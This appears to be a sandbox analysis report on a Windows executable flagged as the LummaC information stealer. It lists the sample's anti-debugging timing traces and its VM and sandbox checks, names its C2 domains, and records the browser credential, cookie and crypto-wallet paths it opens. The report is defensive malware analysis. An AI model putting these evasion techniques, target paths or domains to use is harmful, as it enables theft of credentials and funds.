                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53009BF second address: 5300A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC52457Fh 0x00000009 jmp 00007F29FC524583h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F29FC524588h 0x00000015 add cx, 9808h 0x0000001a jmp 00007F29FC52457Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov cx, 6F11h 0x0000002b mov dx, si 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300A1F second address: 5300A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300A25 second address: 5300A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, 6Eh 0x0000000f pushad 0x00000010 mov al, bl 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300A49 second address: 5300A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F29FC6B5C9Ch 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC6B5CA7h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300A77 second address: 5300AB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 call 00007F29FC524586h 0x00000015 pop esi 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300AB3 second address: 5300AB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300AB9 second address: 5300ABD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300ABD second address: 5300B3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 jmp 00007F29FC6B5CA6h 0x0000000e mov esi, dword ptr [ebp+0Ch] 0x00000011 pushad 0x00000012 mov bx, ax 0x00000015 pushad 0x00000016 jmp 00007F29FC6B5CA8h 0x0000001b mov si, 3FC1h 0x0000001f popad 0x00000020 popad 0x00000021 test esi, esi 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F29FC6B5C9Ah 0x0000002a and esi, 7143DBD8h 0x00000030 jmp 00007F29FC6B5C9Bh 0x00000035 popfd 0x00000036 mov edx, esi 0x00000038 popad 0x00000039 je 00007F2A6C793528h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F29FC6B5C9Ch 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300B3B second address: 5300B3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300B3F second address: 5300B45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300B45 second address: 5300B73 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, 0D6C4A13h 0x00000008 jmp 00007F29FC524588h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 cmp dword ptr [7544459Ch], 05h 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300B73 second address: 5300B8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pop esi 0x0000000a pop edi 0x0000000b popad 0x0000000c je 00007F2A6C7AB5AEh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300B8A second address: 5300BE9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524586h 0x00000008 or esi, 43F4E228h 0x0000000e jmp 00007F29FC52457Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov bl, ah 0x00000018 popad 0x00000019 push esi 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007F29FC52457Eh 0x00000021 add eax, 1F6C9488h 0x00000027 jmp 00007F29FC52457Bh 0x0000002c popfd 0x0000002d mov edx, eax 0x0000002f popad 0x00000030 mov dword ptr [esp], esi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300BE9 second address: 5300BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300BED second address: 5300C04 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524583h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300C04 second address: 5300C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300C0A second address: 5300C0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300C0E second address: 5300C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300CB8 second address: 5300CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524588h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300CD8 second address: 5300CDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Tries to evade debugger and weak emulator (self modifying code)
                Source: C:\Users\user\Desktop\zi042476Iv.exeSpecial instruction interceptor: First address: 1B8A46 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exeSpecial instruction interceptor: First address: 35C358 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exeSpecial instruction interceptor: First address: 35C701 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exeSpecial instruction interceptor: First address: 382D6C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exeSpecial instruction interceptor: First address: 3E3AE7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\zi042476Iv.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 2216Thread sleep time: -32016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 5640Thread sleep time: -150000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exe TID: 6880Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: zi042476Iv.exe, zi042476Iv.exe, 00000000.00000002.1618070433.000000000033E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000002.1619575461.00000000012C8000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619850261.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619850261.00000000012FC000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1550699749.00000000012FB000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1381810990.00000000012F9000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWbi[$
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405616593.0000000005CD5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696497155p
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405616593.0000000005CD0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696497155f
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696497155s
                Source: zi042476Iv.exe, 00000000.00000002.1618070433.000000000033E000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696497155~
                Source: zi042476Iv.exe, 00000000.00000003.1405769884.0000000005C72000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
                Source: C:\Users\user\Desktop\zi042476Iv.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Hides threads from debuggers
                Source: C:\Users\user\Desktop\zi042476Iv.exeThread information set: HideFromDebuggerJump to behavior
                Tries to detect sandboxes and other dynamic analysis tools (window names)
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\zi042476Iv.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: SICE
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\zi042476Iv.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                LummaC encrypted strings found
                Source: zi042476Iv.exeString found in binary or memory: hummskitnj.buzz
                Source: zi042476Iv.exeString found in binary or memory: cashfuzysao.buzz
                Source: zi042476Iv.exeString found in binary or memory: appliacnesot.buzz
                Source: zi042476Iv.exeString found in binary or memory: screwamusresz.buzz
                Source: zi042476Iv.exeString found in binary or memory: inherineau.buzz
                Source: zi042476Iv.exeString found in binary or memory: scentniej.buzz
                Source: zi042476Iv.exeString found in binary or memory: rebuildeso.buzz
                Source: zi042476Iv.exeString found in binary or memory: prisonyfork.buzz
                Source: zi042476Iv.exeString found in binary or memory: mindhandru.buzz
                Source: zi042476Iv.exe, 00000000.00000002.1618370549.0000000000382000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
                Source: C:\Users\user\Desktop\zi042476Iv.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: zi042476Iv.exe, 00000000.00000003.1554987288.0000000005CAC000.00000004.00000800.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000002.1619575461.00000000012E3000.00000004.00000020.00020000.00000000.sdmp, zi042476Iv.exe, 00000000.00000003.1551564568.00000000012FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\zi042476Iv.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: zi042476Iv.exe PID: 6492, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Found many strings related to Crypto-Wallets (likely being stolen)
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                Source: zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty
                Source: zi042476Iv.exe, 00000000.00000003.1529546451.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                Source: zi042476Iv.exeString found in binary or memory: ExodusWeb3
                Source: zi042476Iv.exe, 00000000.00000003.1617473281.00000000012FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
                Source: zi042476Iv.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                Source: zi042476Iv.exe, 00000000.00000003.1529489593.0000000001352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\3nxxd8pi.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\zi042476Iv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
